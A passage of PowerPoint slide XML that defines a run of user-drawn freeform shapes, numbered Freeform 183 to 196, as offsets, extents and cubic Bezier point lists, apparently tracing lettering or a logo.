                <a:ext cx="83" cy="245"/>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6"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Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6435" y="256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Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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8" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>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Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781" y="256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1" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="200"/>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Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978" y="2562"/>
                <a:ext cx="83" cy="245"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="5" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>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Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7127" y="256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Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325" y="2562"/>
                <a:ext cx="82" cy="245"/>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50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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>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Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="2564"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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7" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>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3"/>
                      <a:pt x="127" y="100"/>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Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671" y="2562"/>
                <a:ext cx="81" cy="245"/>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50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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>
                      <a:pt x="0" y="31"/>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Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="2555"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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60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4 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 71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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>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4"/>
                      <a:pt x="4" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="179"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="99"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="64"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="122" y="29"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>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8"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="160"/>
                      <a:pt x="139" y="160"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="188"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="172" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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7" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37"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5"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>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3"/>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4" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="172"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="159"/>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7"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>
                      <a:pt x="136" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="123"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="132"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="52"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98"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Freeform 193"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="2614"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 1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0"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>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Freeform 194"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="261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Freeform 195"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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Freeform 196"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
